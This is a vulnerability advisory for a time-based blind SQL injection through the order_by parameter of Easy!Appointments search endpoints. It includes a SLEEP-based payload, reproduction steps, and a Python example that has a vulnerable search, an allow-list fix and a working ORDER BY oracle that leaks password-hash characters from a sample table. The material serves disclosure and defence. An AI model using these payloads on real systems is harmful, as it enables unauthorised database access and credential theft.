# CVE-2025-50383
# Description
A low-privileged authenticated user of Easy!Appointments (alextselegidis/easyappointments) can exploit this vulnerability by sending a crafted HTTP POST request to one of the search endpoints listed below with a malicious order_by parameter (e.g., order_by=IF(1=1,SLEEP(5),1)). The parameter is used to build the ORDER BY clause of the search query and is not restricted to known column names, so the payload is evaluated by the underlying MySQL database. A delayed response confirms time-based blind SQL injection; from there an attacker can execute arbitrary SQL against the application's database.
# Affected Endpoints
Exploitable by low-privileged authenticated users (roles: Customers and Providers):
1. /index.php/customers/search
2. /index.php/Unavailabilities/search
3. /index.php/Appointments/search
Exploitable only by Administrator:
1. /index.php/providers/search
2. /index.php/secretaries/search
3. /index.php/admins/search
4. /index.php/service_categories/search
5. /index.php/services/search
6. /index.php/Blocked_periods/search
7. /index.php/Webhooks/search
# Steps to Reproduce
1. Intercept a valid authenticated request (e.g., with a proxy) to one of the vulnerable endpoints.
2. Add the order_by parameter to the request body (the web UI does not send it, but the endpoint reads it).
3. Inject a malicious payload, for example: order_by=IF(1=1,SLEEP(5),1)
4. Send the modified request.
5. The application response is delayed by roughly five seconds, confirming time-based blind SQL injection. Compare against the unmodified request, or the same request with order_by=IF(1=1,SLEEP(0),1), to rule out ordinary network latency.
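The vulnerable pattern and its fix, as an added example that is not code from the Easy!Appointments project: a search function that interpolates order_by straight into the query, the same function restricted to an allow-list of sortable columns, and a blind oracle that extracts data through ORDER BY. SQLite stands in for MySQL here, so the page's SLEEP() payload is replaced by a boolean ordering oracle (the root cause is identical); the users table, its columns and its rows are constructed for the example and are not the project's schema.

```python
import re
import sqlite3

# Constructed sample rows; the schema and values are invented for this example
# and are not Easy!Appointments' real tables.
SAMPLE_USERS = [
    (1, "alice", "s3cret_hash_a"),
    (2, "bob", "s3cret_hash_b"),
    (3, "carol", "s3cret_hash_c"),
]


def make_db():
    """Build an in-memory SQLite database standing in for the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def search_vulnerable(conn, keyword, order_by):
    """Vulnerable pattern: keyword is bound, but order_by is pasted into the SQL."""
    sql = f"SELECT id, name FROM users WHERE name LIKE ? ORDER BY {order_by}"
    return conn.execute(sql, (f"%{keyword}%",)).fetchall()


# Hardened pattern: only a known column name plus an optional direction is accepted.
SORTABLE_COLUMNS = {"id", "name"}
_ORDER_BY_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\s*(ASC|DESC)?\s*$", re.IGNORECASE)


def safe_order_by(order_by):
    """Return a canonical 'column DIRECTION' string, or raise on anything else."""
    match = _ORDER_BY_RE.match(order_by or "id")
    if not match or match.group(1).lower() not in SORTABLE_COLUMNS:
        raise ValueError(f"order_by not allowed: {order_by!r}")
    direction = (match.group(2) or "ASC").upper()
    return f"{match.group(1).lower()} {direction}"


def is_safe_order_by(order_by):
    """Convenience predicate around safe_order_by()."""
    try:
        safe_order_by(order_by)
        return True
    except ValueError:
        return False


def search_hardened(conn, keyword, order_by):
    """Same query, but order_by can only ever be an allow-listed column."""
    sql = f"SELECT id, name FROM users WHERE name LIKE ? ORDER BY {safe_order_by(order_by)}"
    return conn.execute(sql, (f"%{keyword}%",)).fetchall()


def oracle_payload(position, guess):
    """Boolean oracle through ORDER BY: rows sort by name when the guessed character
    of user 3's password_hash is right, otherwise by descending id. On MySQL the
    page's IF(1=1,SLEEP(5),1) works in the same slot; SQLite has no SLEEP(), so the
    leak is read from the row order instead of the response time."""
    return (
        f"CASE WHEN (SELECT substr(password_hash, {position}, 1) FROM users WHERE id = 3)"
        f" = '{guess}' THEN name ELSE -id END"
    )


def leak_hash_prefix(conn, length, alphabet="abcdefghijklmnopqrstuvwxyz0123456789_"):
    """Recover the first `length` characters of user 3's hash via the vulnerable search."""
    expected = search_vulnerable(conn, "", "name")  # sorted by name: alice, bob, carol
    recovered = ""
    for position in range(1, length + 1):
        for ch in alphabet:
            if search_vulnerable(conn, "", oracle_payload(position, ch)) == expected:
                recovered += ch
                break
        else:
            break  # no candidate matched; stop rather than guess
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable search:", leak_hash_prefix(db, 6))
    print("hardened search accepts 'name DESC':", search_hardened(db, "", "name DESC"))
    print("hardened search rejects payload:", not is_safe_order_by(oracle_payload(1, "s")))
```

The allow-list approach is the fix to look for in the patched release: the sort column must be chosen from a fixed set of known names and the direction from ASC/DESC, with everything else rejected, because ORDER BY cannot be parameterised with a bound placeholder the way WHERE values can.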
# Fixed
https://github.com/alextselegidis/easyappointments/releases/tag/1.5.2-beta.1